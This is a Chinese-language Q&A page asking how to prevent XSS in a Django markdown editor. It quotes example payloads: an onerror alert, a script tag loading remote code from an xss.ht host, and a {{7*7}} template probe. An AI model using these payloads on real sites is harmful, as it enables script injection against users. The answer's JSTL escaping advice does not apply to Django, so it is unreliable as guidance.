django - 如何使用 HTML/Javascript 防止 XSS 攻击?
问题描述
我想知道如何防止脚本代码和 HTML 属性在我的网站编辑器中停止执行?
如果有人在 HTML 标签的某些属性中添加带有代码外部链接的脚本标签或调用 jQuery 的函数。
我正在使用降价编辑器和 django 框架。
例如:
'>"></title></style></textarea></script><img src=x onerror=alert(document.domain)></script>
'>"></title></style></textarea></script><script/src=https://samengmg.xss.ht></script>
{{7*7}}{7*7}
解决方案
对所有输入字段使用 htmlEscape="true"。如果要显示一个值,请尝试 fn:escapeXml(value)。您需要导入 jstl 函数 taglib